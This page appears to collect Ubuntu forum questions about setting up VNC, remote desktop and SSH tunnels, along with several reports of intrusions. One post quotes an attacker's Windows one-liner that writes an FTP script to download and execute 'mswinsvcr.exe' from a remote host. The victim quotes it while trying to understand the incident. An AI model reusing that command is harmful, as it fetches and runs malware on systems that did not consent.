Ubuntu Security :: VNC Setup With SSH Tunneling For Remote Desktop
Feb 16, 2010
I am attempting to set up a VNC with ssh tunneling for remote desktop between my laptop (opensuse 11.2) and my desktop (kubuntu karmic) and using the instructions here: [URL] and here: [URL] but I am having trouble getting remote desktop to work once I establish the ssh tunnel
I start out with
Code:
ssh <user@remotepc> -p <non22port> -L 5900:localhost:5900
That seems to wok and connect properly
The problem comes when I try to use a remote desktop client on the laptop to initiate the VPN desktop sharing and point it to
Code:
localhost:5900
Thats when I get a notification on the host saying:
Code:
Refused uninvited connection attempt from 127.0.0.1
And on the laptop I get:
Code:
VNC server closed connection
I have tried messing with the few settings in Krfb, but none seem to have any impact. How do I open localhost:5900 and allow VPN tunneling to the host machine?
View 2 Replies
ADVERTISEMENT
Jul 6, 2010
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server
View 9 Replies
View Related
Mar 24, 2010
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop
2a. Checked Allow other users to view....
2b. Checked Allow other users to control....
2c. Checked You must confirm.....
2d. Checked for password, and put in a password
2e. Checked Configure network automatically to accept connectios
So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
View 9 Replies
View Related
Oct 20, 2010
install ubuntu 10.04 desktop, configure remote desktop so I can connect from my Mac or Windows machine without being physically be at the ubuntu machine, and I won't have a dedicated monitor for the ubuntu box either. And I want to have root access to everything via remote desktop or VNC.What I have tried: system->preferences->remote desktop to enable remote desktop, I can connect and see the desktop, the mouse clicks would only show on the directly connected monitor, not in my VNC session.Then I tried to install TightVNC server, start a at display :1, I can also connect, but every time any action requires a root access, such as installing a package using Ubuntu Software Center, the root password prompt would only show up on the directly connected monitor.
I also install xrdp package, and followed instructions here: [URL]It actually worked using Remote Desktop application from my Mac or Windows box for a little while until I restarted the machine, thinking I can unplug the monitor and connect via remote desktop from then on. Then it stopped working.
View 7 Replies
View Related
Nov 27, 2010
I am Trying to set up my desktop in order to access it from a remote computer using Remote desktop. I have ubuntu 10.10 and am using the included software remote desktop. When I run the programm is says i can only connect locally using the name "local host". I am trying to connect to my desktop from a vnc app on my ipod touch. It asks me for the ip address and the port.
View 1 Replies
View Related
Jul 15, 2010
I am useing bshellz and i want to know how do i setup ssh tunneling in firefox when i am surfing the web.I newbie when it come to ssh tunneling.
View 3 Replies
View Related
Apr 13, 2010
I would like to set up a remote desktop connection between two computers over the Internet. I already tested remote desktop within a local network but it's far from secure enough this time. I will try to follow this guide [URL] (ssh portforward and internet). This still leaves ufw and how it should be configured. Let's say I have this setup, server computer has ip 12.341.245.124 and the client has 78.12.543.234 how should ufw be configured to be secure? This remote desktop wont be connected to a local network
View 1 Replies
View Related
Jan 6, 2010
I am trying to set up a remote server on an old desktop that i have and i am running into problems. I have the packet installed but i can not get it to run. When ever I enter /sbin/service sshd start
I get Generating SSH1 RSA host key:[FAILED] and i can not for the life of me figure it out. Running fedora 12
View 2 Replies
View Related
Mar 16, 2010
I am a Linux newbie. I am trying to see if it is possible to access a windows pc through some form of vpn/rdp setup. My machine is dual boot with Windows XP. On Windows XP, I am able to connect to my office via VPN client to connect to my office, then Remote Desktop to my local machine on the network.. Is there some way for me to do this with Linux? I find it really annoying to have to boot to Windows just to access my work pc.
View 9 Replies
View Related
Feb 21, 2010
I am playing around with the idea of being able to use a cloud or instance based service to install Ubuntu 9.10 Server. This will enable me to have remote access via SSH command line.So far, I've installed Ubuntu 9.10 Server + Ubuntu Desktop to a virtual machine. I can access this via SSH and locally via the desktop. However, in the real environment the only access I am going to have initially is via SSH.
I would like to be able to connect using Windows Remote Desktop or VNC (whichever is easier and most importantly - most secure) to the machine.. even though the desktop is on there, I need to somehow configure the remote access all from the command line.I've had a read of various forums and have been trawling support forums for days but can't find a working solution for 9.10 Server or that fits my situation above where I will not have any physical access to the desktop or machine to configure remote desktop. It all has to be done via SSH/command line.
View 4 Replies
View Related
Mar 21, 2010
Today I noticed my Desktop was being controlled remotely from over the Internet even though I had it set for 'local network only'. Foolishly I relied on this setting and hadn't specified a password or other security. The remote user had opened my Firefox passwords page and was perusing this when I pulled the plug.
All external checks confirmed that my router/firewall is actively blocking correctly. How could this happen? How can I prevent this in the future? I had recently install the Firefox extension for Weave Sync and wonder if that had anything to do with it?
View 9 Replies
View Related
Nov 26, 2010
I just had a window pop up on my desktop saying my pc was being remotely controlled. Ubuntu 10.10The pc shutdown by itself, and I disconnected it from the net.I rebooted and uninstalled the remote desktop app.
View 7 Replies
View Related
Mar 28, 2010
I have a local computer (local), and remote computer (remote) behind of remote server (server). Also, I have user access to all of these 3 machines. Now, I want mount some directory, located at remote, to my local mount-point via sshfs. How should I setup my local sshfs and what should be done on server to make this mounting?
I'm stuck with ssh tunneling because the default method for tunneling requires root access while WinSCP somehow could do this with only user access (the tunnel server could be configured there in 'tunnel' panel).
View 5 Replies
View Related
Jun 5, 2011
I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
View 1 Replies
View Related
Aug 1, 2011
I have been using Remote desktop on Windows 7 to view and control my Ubuntu machine in the office quite happily over the office network. No problems there. I wanted to access it from my home connection so I read that I could do this by opening a port on the ubuntu machine's firewall. So I installed a firewall. Didnt see any way to open a port easily so I uninstalled it and installed another one. Same issue so I uninstalled that and then left it. I then tried to Remote Desktop the Ubuntu machine from my Windows 7 laptop and ERROR I can no longer connect.
View 6 Replies
View Related
Apr 27, 2010
I was working on my desktop under Ubuntu 9.10 when I got a message in the the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.
Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing. Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?
View 6 Replies
View Related
Jul 3, 2010
I bought a mlb.tv to watch baseball game online and they have blackout for local teams. I try to use proxy sock to bypass the blackout, but for some reason they know my location because I'm getting blackout. I check to see if they were just checking for proxies and I went and I try to watch other games not in my area and I was able to watch it. I use this command on the ssh client "ssh -D 9090 user@domain.com" and I change the setting on my network. I do a ip lookup and the ip address is from the server location. I dont want you guys to tell how to bypass, I just want to understand how they know my location.
View 1 Replies
View Related
Oct 14, 2010
I have a home LAN server with Ubuntu Desktop edition 10.10 and I'm having a problem with remote desktop application. For now I have a monitor on that machine, but in the future it's gonna be only the box, without any periferal devices. When I try to log in via UltraVNC from Windows XP, on Ubuntu server a little window pops up, asking me to allow or refuse this "invader", so I click Allow and I really have full control on that machine. However, when I dont have any devices I wouldnt be able to click this Allow button, but will have to have full control. So, my question is how to autoclick this Allow button? Or when I try to log in the ubuntu machine, it would automatically give me full control?
View 5 Replies
View Related
Dec 30, 2010
host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?
View 2 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
Apr 4, 2011
Basically, whenever I am on an unencrypted wireless hotspot, I open up an SSH tunnel to my home server to do all my browsing for the privacy and security it provides.But I got to thinking, and now I am curious, if I am visiting a site like gmail for instance that always uses SSL/TLS for it's connections, is there any added benefit to also using an encrypted tunnel? or is it perhaps superfluous to use both
View 3 Replies
View Related
Mar 14, 2010
I ended up setting up a basic linux file server as a pdc for that office. Our main office is a windows 2000 ads domain. The two offices are connected with a vpn. I only have two users at the new location so I simply have the linux and samba usernames/passwords setup manually. I would like to know if it is possible to setup a domain trust between the two sites so I don't have to create a username/password in the remote site for every user at the main office to access. I did some searching but came up empty.
View 5 Replies
View Related
Jan 11, 2010
was home when the attack took place I was running a vnc server that was tunnled thru ssh. At approximatley 5:00 pm eastern time my box turned on firefox and flashed a popup. I tried to get to the logs and then realized that the entre system had been hijacked the remote desktop icon was active there was a message in gnote saying "youve been own3d". The system Is a old mac mini PPC system and i plan on looking at the system log with a netboot cd by running linux rescue at boot. my question is how do i gain access to the system log from a rescue cd to find out how much damage this hacker did?
View 4 Replies
View Related
Feb 6, 2011
I maintain plain vanilla Ubuntu 10.04 systems for several friends. Each machine has only one user, the owner. I use Remote Desktop to instruct and to perform maintenance. Here's my problem:After updating the system, if the kernel has changed, a restart is needed. If I do a restart, I then have to phone the owner to insert his login credentials in the gdm login screen, before I can do anything else via Remote Desktop on that machine.There ought to be a simple way I can avoid the phone call and login myself.
I'd strongly prefer not to use any software that is not included in a plain vanilla Ubuntu 10.04 installation. And I don't want to weaken system security beyond what it is now.Is there a solution? Or, what is the simplest solution?
View 2 Replies
View Related
Mar 18, 2010
I'm working on getting my myth box hooked up to my Sony flat panel display.Originally the nvidia drivers could not read the EID, so defaulted to only 640x480 over my HDMI-DVI connection.I manually updated xorg.conf with a mode for the resolution I know the thing can handle. Suddenly there are several resolutions avaialble in nvidia-settings and it seems to be communicating with the TV, as it is now listed as a Sony FP display rather than a CRT.I'm able to change the resolution now as expected.my problem, however, lies with the TV itself. I can't seem to get it to actually display the output. I'm able to remote desktop into the box and can see Gnome logged in and everything.However nothing on the TV itself.How do I troubleshoot this? Am I missing something obvious?
View 6 Replies
View Related
Nov 20, 2010
I have my main box, Ubuntu 10.04lts, and I am trying to use remote desktop viewer to see the desktop on a Windows XP machine. The machines are side by side The Ubuntu box is hardwired to my network router, and the XP machine is connected via wireless. Both get to the internet fine, and I can ping the Ubuntu box from the XP box. But, I cannot ping the XP box from the Ubuntu box, and Remote Desktop Viewer won't establish a connection to the VNC server I have running on the XP box.
View 6 Replies
View Related
Nov 25, 2010
I am using 2 PCs, both running ubuntu. I want to connect via remote desktop (vnc, ssh -X, etc) form one to the other. However, what the solutions I found until now offer me, is the possibility to create a new desktop session and view that one (or run an application an view that one). I have an application running on the server, and I want to see that application, without needing to restart it or running it again in a new desktop. Is this possible?
View 1 Replies
View Related
Apr 8, 2011
I am trying to setup my HTPC. I wanted to have the most minimal overhead possible so I installed Ubuntu 10.10 server from the mini.iso and just added the ssh option. I then used the following command to give me a desktop environment because I will want to run firefox and it apparently requires this to run.
Here is the command that I ran:apt-get install xorg gnome-core gdm gnome-applets gnome-system-tools gnome-utils ubuntu-artwork compiz-gnome firefox sysv-rc-conf.The desktop works fine and I can open fire fox, however, the remote desktop is missing from the preferences menu.How can I install this? I would like to add the remote desktop option from a command line.
View 6 Replies
View Related
Jul 19, 2011
I have set up a server running ubuntu desktop, and I'm able to logon through remote desktop (win 7). The problem is that if I logon from computer 1 and open some programs, I don't see these programs when I logon from computer 2.I logon with the same user, so I find this strange. Is there some setting I have missed to be able to see the same from any computer (logon through remote desktop).
View 5 Replies
View Related
Jul 10, 2011
Is there a way to have drag and drop access between Linux and a Windows remote desktop connection?
View 1 Replies
View Related
